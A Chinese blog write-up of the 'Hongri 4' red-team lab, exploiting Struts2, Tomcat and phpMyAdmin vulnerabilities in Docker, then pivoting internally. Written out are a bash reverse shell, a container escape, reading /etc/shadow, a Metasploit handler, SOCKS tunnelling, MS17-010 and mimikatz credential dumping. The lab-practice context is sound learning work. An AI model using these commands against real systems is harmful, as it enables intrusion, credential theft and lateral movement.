红队打靶,红日靶场系列,红日靶场4


环境搭建:

在这里插入图片描述

攻击机:
真实机win10
kali : 192.168.0.128
靶机:
web:192.168.183.130, 192.168.0.129
dc: 192.168.183.129
win7:192.168.183.128
启动docker环境,输入sudo后提示输入密码,输入ubuntu即可

cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/
sudo docker-compose up -d

外网渗透:

先用RG来个端口扫描,探测到几个端口和三个服务,phpmyadmin,tomcat,struts2
在这里插入图片描述

Struts2

访问2001端口可以看到个struts2的文件上传页面,直接上工具扫一下看看是否存在漏洞,发现一大堆

在这里插入图片描述
点击执行命令,查询系统进程的cgroup信息,看看目标是否是docker环境
在这里插入图片描述
很明显目标由docker搭建,看看是否可以进行docker逃逸
在kali中开启一个监听
在这里插入图片描述

在struts2内执行反弹shell的命令 bash -i &>/dev/tcp/192.168.0.128/8888 <&1
在这里插入图片描述
kali成功接收shell
在这里插入图片描述
docker逃逸
这里出不去,看下个端口

参考这篇文章:https://xz.aliyun.com/t/12495

phpmyadmin

phpmyadmin提权可以参考红日1

https://editor.csdn.net/md/?articleId=131577749

tomcat

扫一下,发现存在一个CVE-2017-12615具体可以一下这篇文章:tomcat系列漏洞复现
在这里插入图片描述
使用put方法写入一个webshell
在这里插入图片描述
冰蝎连接
在这里插入图片描述
命令执行,发现可以挂载光盘
在这里插入图片描述
将真实机挂在到docker里面

mkdir /test
mount /dev/sda1 /test
cd /test
ls -al

可以看到真实机的一些东西
在这里插入图片描述
执行下面命令可以看到所有用户的密码信息

cat /etc/passwd
cat /etc/shadow

这里可以在相同版本的ubuntu中进行创建用户密码,覆盖现有的密码,之后进行ssh连接,看不到密码信息的用哥斯拉连接
在这里插入图片描述
连接ssh后进行提权
在这里插入图片描述
root 下面添加一个当前登录的用户,权限写成和root一样
在这里插入图片描述
权限变成了root
在这里插入图片描述

内网渗透

msf上线

拿到主机权限之后发现有两块网卡,183网段使用kali无法通信,肯定为内网地址
在这里插入图片描述
使用kali生成后门,并用xshell上传到ubuntu
在这里插入图片描述
并赋予执行权限
在这里插入图片描述
打开msf,配置、监听、执行

use exploit/multi/handler  #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload
set lhost 192.168.0.128 #kaili 的ip
set lport 4444 #木马的端口
run #执行

上线成功
在这里插入图片描述

建立代理

在msf里添加路由

run post/multi/manage/autoroute

在这里插入图片描述
这里用到一款工具,建立代理的话比较方便

https://github.com/idlefire/ew

在kali上执行命令

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

在这里插入图片描述

在目标主机上上传ew_for_linux64,执行命令

./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234

在这里插入图片描述
创建成功
在这里插入图片描述
用kali ping一下内网,看看代理是否创建成功
在这里插入图片描述

内网信息收集

可以看到kali成功打入内网,使用msf模块进行内网主机探测

use auxiliary/scanner/discovery/udp_probe
set RHOSTS 192.168.183.0/24
set THREADS 15
run

发现两台主机
在这里插入图片描述
在这里插入图片描述
使用nmap扫一下,发现445端口都开着,试一下ms17010
在这里插入图片描述
你妹的,坑死了,这里利用ms17010攻击的时候要把火绒退了,不然会拦截,这里成功拿下win7
在这里插入图片描述
server的话可以攻击成功,但是创建不了会话
解决Kali中MSF Console拿到Windows shell后显示中文乱码问题,在拿到的Windows shell中输入如下命令,设置活动代码页字符为UTF-8编码。

chcp 65001

在这里插入图片描述

密码获取

提权:使用meterpreter里面使用令牌窃取SYSTEM权限之后再进行mimikatz密码进行抓取

use incognito
impersonate_token "NT AUTHORITY\SYSTEM"

在这里插入图片描述
成功获取win7在域里的明文密码
在这里插入图片描述
在这里插入图片描述

总结

有些过程思路很清晰,但是做起来各种问题,总结:还是带练
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值